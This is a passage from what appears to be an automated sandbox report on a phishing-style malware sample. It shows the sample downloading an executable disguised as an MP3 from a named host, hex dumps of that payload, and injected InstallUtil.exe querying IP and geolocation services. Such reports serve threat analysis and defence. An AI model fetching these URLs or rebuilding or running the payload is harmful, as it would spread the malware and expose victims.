                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:27.170015097 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: d05f89e18b7e92f6052dabac2f86ba48
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.549750158.101.44.242805780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:27.764898062 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:29.895591021 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:29 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 77270bd66d70bb41038fe2de52f3519b
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.549752158.101.44.242805780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:30.536752939 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:32.669946909 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:32 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 16167df1d4885e06a36bab9ac1834070
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.549754158.101.44.242805780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:33.262712955 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:35.562149048 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:35 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: ae6a3a458c5c1b4b0653f7006c29dc57
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.549756158.101.44.242805780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:36.215033054 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:38.266191006 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:38 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 7e2b03e5508a8bbd398c985de478fc7c
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.549758158.101.44.242805780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 09:58:38.977634907 CEST151OUTGET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:41.241326094 CEST320INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:41 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 6bbd602ba3219af4e1b07e667215fdaa
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.54970467.212.175.1624433148C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:57:59 UTC86OUTGET /panel/Skdqhzzwa.mp3 HTTP/1.1
                        Host: wymascensores.com
                        Connection: Keep-Alive
                        2024-09-26 07:57:59 UTC210INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:57:58 GMT
                        Server: Apache
                        Last-Modified: Wed, 25 Sep 2024 23:10:38 GMT
                        Accept-Ranges: bytes
                        Content-Length: 1841152
                        Connection: close
                        Content-Type: audio/mpeg
                        2024-09-26 07:57:59 UTC7982INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                        2024-09-26 07:57:59 UTC8000INData Raw: 36 33 32 30 34 46 43 37 46 34 37 37 36 31 37 45 37 46 30 32 30 30 30 34 37 42 36 39 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 31 30 30 30 30 32 42 38 30 34 41 30 30 30 30 30 34 32 30 31 38 30 30 30 30 30 30 33 38 31 34 46 39 46 46 46 46 32 30 45 46 31 31 43 34 38 36 32 30 42 36 43 37 37 36 34 46 36 31 32 30 43 32 35 31 31 34 39 39 36 31 37 45 37 46 30 32 30 30 30 34 37 42 35 34 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 30 32 43 38 42 45 36 36 45 32 30 39 35 33 31 45 30 33 30 36 31 37 45 37 46 30 32 30 30 30 34 37 42 34 42 30 32 30 30 30 34 36 31 37 45 42 45 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 34 34 30 30 30 30 30
                        Data Ascii: 63204FC7F477617E7F0200047B69020004617EBE020004283F090006281100002B804A00000420180000003814F9FFFF20EF11C48620B6C7764F6120C2511499617E7F0200047B54020004617EBE020004283F090006202C8BE66E209531E030617E7F0200047B4B020004617EBE020004283F090006281200002B804400000
                        2024-09-26 07:57:59 UTC8000INData Raw: 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 36 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 30 30 33 30 30 30 36 32 30 30 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33
                        Data Ascii: 0004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000162A0000001330030004000000000000000000002A1330030004000000000000000000002A13300300800000000100001128800300062002000000FE0E00003
                        2024-09-26 07:57:59 UTC8000INData Raw: 30 30 34 37 30 30 30 30 30 30 33 30 30 32 30 30 30 30 37 37 30 32 30 30 30 30 33 41 30 30 30 30 30 30 31 42 30 30 30 30 30 31 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 30 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 45 30 30 30 30 30 30 33 38 32 41 30 30 30 30 30 30 37 45 39 39 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 39 33 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 41 30 32 30 30 30 34 32 38 41 46 30
                        Data Ascii: 004700000030020000770200003A0000001B00000113300300800000000100001128800300062001000000FE0E00003800000000FE0C000045030000002F000000050000002E000000382A0000007E9902000428AB08000620000000007E7F0200047B930200043ACCFFFFFF26200000000038C1FFFFFF2A7E9A02000428AF0
                        2024-09-26 07:57:59 UTC8000INData Raw: 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 39 36 30 32 30 30 30 34 33 39 43 43 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 39 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 37 46 30 32 30 30 30 34 37 42 37 37 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30
                        Data Ascii: 02000428AF08000620020000007E7F0200047B9602000439CCFFFFFF26200100000038C1FFFFFF2A7E9902000428AB08000620000000007E7F0200047B770200043AA2FFFFFF2620000000003897FFFFFF120000002A000000120000142A000000120000002A000000120000002A000000120000002A000000120000002A000
                        2024-09-26 07:57:59 UTC8000INData Raw: 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 43 46 30 30 30 30 30 30 39 32 30 30 30 30 30 30 36 31 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 39 33 30 30 30 30 30 30 35 39 30 31 30 30 30 30 45 43 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30
                        Data Ascii: 2A1330050004000000000000000000002A0330080004000000000000000000142A4134000002000000CF00000092000000610100008B00000000000000020000009300000059010000EC0100008B000000000000001330040004000000000000000000142A1330050004000000000000000000142A033008000400000000000
                        2024-09-26 07:57:59 UTC8000INData Raw: 30 36 31 45 31 43 31 46 33 39 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 46 31 46 30 41 31 46 33 41 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 42 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30
                        Data Ascii: 061E1C1F3906286B030006120609110411051F0F1F0A1F3A06286B030006120511060911041C1F0F1F3B06286B030006120411051106091F0D1F151F3C06286B03000612031104110511061A1C1F3D06286B030006120609110411051F0B1F0A1F3E06286B03000612051106091104181F0F1F3F06286B03000612041105110
                        2024-09-26 07:57:59 UTC8000INData Raw: 31 31 30 30 30 30 30 30 33 38 41 36 46 37 46 46 46 46 30 30 37 45 36 41 30 31 30 30 30 34 37 32 46 35 30 31 30 30 37 30 32 38 42 35 30 33 30 30 30 36 37 33 35 36 30 34 30 30 30 36 32 35 32 38 42 36 30 33 30 30 30 36 31 36 36 41 32 38 42 37 30 33 30 30 30 36 32 35 32 35 32 38 42 36 30 33 30 30 30 36 32 38 42 38 30 33 30 30 30 36 36 39 32 38 42 39 30 33 30 30 30 36 31 33 31 46 32 30 32 30 30 30 30 30 30 30 38 44 31 44 30 30 30 30 30 31 46 45 30 45 31 34 30 30 32 30 30 31 30 30 30 30 30 30 32 30 34 32 30 30 30 30 30 30 35 38 46 45 30 45 32 38 30 30 46 45 30 43 31 34 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 32 38 30 30 39 43 46 45 30 43 31 34 30 30 32 30 30 30 30 30 30 30 30 30 32 30 46 34 30 30 30 30 30 30 32 30 35 31 30 30 30 30 30 30 35 39 39 43 32
                        Data Ascii: 1100000038A6F7FFFF007E6A01000472F501007028B503000673560400062528B6030006166A28B7030006252528B603000628B80300066928B9030006131F20200000008D1D000001FE0E14002001000000204200000058FE0E2800FE0C14002000000000FE0C28009CFE0C1400200000000020F40000002051000000599C2
                        2024-09-26 07:57:59 UTC8000INData Raw: 30 30 46 45 30 43 31 31 30 30 32 30 30 32 30 30 30 30 30 30 46 45 30 43 31 35 30 30 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 35 36 30 30 30 30 30 30 32 30 35 46 30 30 30 30 30 30 35 38 39 43 32 30 39 39 30 30 30 30 30 30 32 30 33 33 30 30 30 30 30 30 35 39 46 45 30 45 31 35 30 30 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 46 45 30 43 31 35 30 30 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 38 36 30 30 30 30 30 30 32 30 32 43 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 43 42 30 30 30 30 30 30 32 30 34 33 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 31 30 30 32 30 30 33 30 30 30 30 30 30 32 30 38 37 30 30 30 30 30 30 32 30 34 39 30 30 30 30 30 30 35 38 39
                        Data Ascii: 00FE0C11002002000000FE0C15009CFE0C110020030000002056000000205F000000589C2099000000203300000059FE0E1500FE0C11002003000000FE0C15009CFE0C110020030000002086000000202C000000599CFE0C1100200300000020CB0000002043000000599CFE0C1100200300000020870000002049000000589
                        2024-09-26 07:57:59 UTC8000INData Raw: 30 30 33 38 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 33 30 36 30 30 30 30 35 33 30 36 30 30 30 30 30 36 30 30 30 30 30 30 31 42 30 30 30 30 30 31 30 36 32 41 30 30 30 30 31 33 33 30 30 34 30 30 33 34 30 30 30 30 30 30 34 44 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 30 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 34 45 30 30 30 30 31 31 37 45 36 31 30 31 30 30 30 34 38 45 33 41 32 39 30 30 30 30 30
                        Data Ascii: 0038060000060000001B00000100000000000000005306000053060000060000001B000001062A000013300400340000004D00001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B0040006262A1B300600BE0100004E0000117E610100048E3A2900000


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549706188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:03 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:03 UTC675INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:03 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2315
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjLtXewIoUbmi6JkFlyyVfloVLCIuX43%2B2h6AgNTXg8AjIN98O8TuV0a2yhxSMk%2BrhVookpUttThfOIs2QKr0cC%2BaVjpeZCsQAprFGns5f9opxR42O9zjwY8Gj7ZDg9mleBDy06l"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b4e89c7b43b9-EWR
                        2024-09-26 07:58:03 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:03 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549707188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:04 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:04 UTC677INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:04 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2316
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eheu6F0iVz%2Bm6hg9LKuYnaaYouSPJDpSYPcG6lXTwxu7es2P55y5Cl%2FzKrZ217nkpmEqd5mgMHNIv%2B2SU9NP7I4Maat%2FKzja4qrrAyrN19qIHTkdqoY1zv3c9pXCzHK3Q2j3yUQP"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b4edccb343c1-EWR
                        2024-09-26 07:58:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:04 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.549709188.114.96.34435500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:07 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:07 UTC683INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:07 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2319
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9h5%2FcBK5ZWGe%2B%2Fa9hVElgYzfQ9iFE4YDxk%2FZrAaj1wBWAkBMkdLKQPcfXaV2w5HAD4IhoHkTwd5L9I7iJ%2BHO8SHyA4iQZjuNcWAza3P8dm5xDzxSOEbdqs%2FS7lYHS2iNpOu1uG8%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b500cab28c7b-EWR
